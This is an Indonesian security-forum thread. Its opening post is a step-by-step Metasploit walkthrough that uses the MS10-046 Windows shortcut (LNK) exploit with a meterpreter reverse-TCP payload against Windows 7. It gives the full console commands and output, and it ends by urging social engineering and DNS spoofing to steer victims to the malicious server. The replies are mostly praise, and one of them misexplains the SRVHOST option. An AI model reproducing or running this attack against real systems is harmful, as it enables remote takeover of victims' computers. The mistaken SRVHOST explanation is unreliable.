Exploit ms10_046_shortcut_icon_dllloader win7 attack
#1
Bug 
exploit ini masih work di windows7 .. walaupun memang dibutuhkan tehnik2 social engineering untuk membawa target membuka malicious url yang sudah anda siapkan sebelumnya … oke untuk tutorial kali ini kembali lagi ane menggunakan dracos2 x64 .. mungkin yang mau nyoba-nyoba dracos bisa kesini

http://dracos-linux.org

Pertama-tama buka console msf kita .. ( bypass lewat msfcli juga bisa kok Smile )

Code:
root@dracos:~# msfconsole

Setelah terbuka seperti ini

[Image: win7exploit.png]

lanjutkan dengan menggunakan fasilitas search

Code:
msf > search LNK
Matching Modules
================
   Name                                                      Disclosure Date  Rank       Description
   ----                                                      ---------------  ----       -----------
   exploit/windows/browser/ms10_046_shortcut_icon_dllloader  2010-07-16       excellent  Microsoft Windows Shell LNK Code Execution
   post/windows/escalate/droplnk                                              normal     Windows Escalate SMB Icon LNK Dropper
   post/windows/gather/dumplinks                                              normal     Windows Gather Dump Recent Files lnk Info

Tuh sudah kelihatan exploit yang kita cari .. gunakan exploit tersebut

Code:
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Terus biar kita jadi mode listener kita gunakan payload windows meterpreter reverse TCP

Code:
msf  exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp

Cek opsi2 yang kita perlu dalam menjalankan exploit ini Big Grin

Code:
msf  exploit(ms10_046_shortcut_icon_dllloader) > show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  80               yes       The daemon port to listen on (do not change)
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Automatic

Ok kita butuh alamat server ( srvhost ) dimana nantinya metasploit akan memulai malicious url dengan port 80 ( default ) dan path / uripath ( / )

Code:
msf  exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.2.7
SRVHOST => 192.168.2.7

Kebetulan sih ip yang ane pake pada percobaan ini adalah

Code:
root@dracos:~# ifconfig wlan0 |grep inet
inet addr:192.168.2.7  Bcast:192.168.2.255  Mask:255.255.255.0
inet6 addr: fe80::f6ec:38ff:fe99:60f3/64 Scope:Link

Terus sebagai persyaratan payload reverse TCP kita wajib memberikan informasi local host kita ( LHOST )
Code:
msf  exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.2.7
LHOST => 192.168.2.7

Jalankan exploit dengan perintah exploit .. gk usah di tambahkan -j untuk opsi background process karena exploit ini sudah dengan sendirinya berjalan di sana

Code:
msf  exploit(ms10_046_shortcut_icon_dllloader) > [*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /bnVuSf
[*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Sending 301 for /bnVuSf ...
[*] 192.168.2.7      ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND
sniff..

hmm ketika target membuka url malicious kita maka dengan sendiri nya server malicious akan mengirimkan backdoor .. dan meterpreter pun terbuka untuk attacker

[Image: win7exploit1.png]

Notes : gunakan tehnik2 social engineering, dns spoof dan masih banyak lagi untuk menggiring korban anda dalam mengakses server malicious anda .. Smile

akhir kata saya ucapkan selamat makan
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#2
nice inpohh kakak zeee ...................;;;;;;;;;;;
The Wolf

#3
mantap om zee, (y) bakal seru nih nampaknya

#4
wow keren om zee, kpn2 perkosa lepi ane lagi yah Tongue
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#5
wakakak akhir katanya selamat makan ada-ada aja om zee nih Big Grin ga ada matinye dah ah kalo maenan metasploit

#6
keren.. ikutan cobain juga ane,, udah gataltangan mw maen metasploit Big Grin
~:: We Are Region Aceh ::~
#Indonesian Backtrack Team Regional Aceh#

#7
baru aja kelar download Confused
langsung coba ah Smile
trimakasih om zee tutornya Smile
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#8
izin mempelajari tricknya om Smile

#9
om zee, maap ni yak ?
srvhost itu apa
kan lhost itu ip kita,
sedangkan srvhost yang om zee bikin itu sama ama lhost...
bisa di jelasin dikit om, biar kagak bingung, thanks om zee ? Big Grin
Quote:~ Tan Hana Wighna Tan Sirna ~

#10
(10-09-2012, 12:43 AM)gnome_selpa Wrote: om zee, maap ni yak ?
srvhost itu apa
kan lhost itu ip kita,
sedangkan srvhost yang om zee bikin itu sama ama lhost...
bisa di jelasin dikit om, biar kagak bingung, thanks om zee ? Big Grin

srvhost itu kalau nda salah server untuk listening dll nya waktu berjalan gitu loh, lihat aja di windos taksmanager, semakin banyak kita buka aplikasi, lihat service srvhost.exe semakin banyak






Users browsing this thread: 1 Guest(s)